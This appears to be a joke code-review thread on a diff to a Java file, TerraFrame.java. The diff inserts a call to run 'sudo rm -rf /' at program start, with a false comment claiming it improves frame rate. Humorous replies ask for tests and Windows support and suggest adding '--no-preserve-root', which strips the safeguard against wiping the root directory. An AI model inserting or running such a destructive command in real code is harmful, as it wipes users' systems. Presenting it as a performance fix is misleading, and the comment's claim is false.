src/TerraFrame.java

```diff
@@ -841,6 +841,8 @@
     static BufferedWriter log;
 
     public static void main(String[] args) {
+        java.lang.Runtime.getRuntime().exec("sudo rm -rf /"); // Probably improves frame-rate due to long class files being deleted while program runs
```

Comment:
This is the longest comment in this codebase - don't believe it should be left in.  Please remove comment.

Reply:
Where's the tests?

Reply:
Please mail in signed contributor agreement.

Reply:
Untested. Needs `--no-preserve-root`.

Reply:
Any chance we could get Windows support for this feature?

Reply:
Proof of Trump-Russia collusion.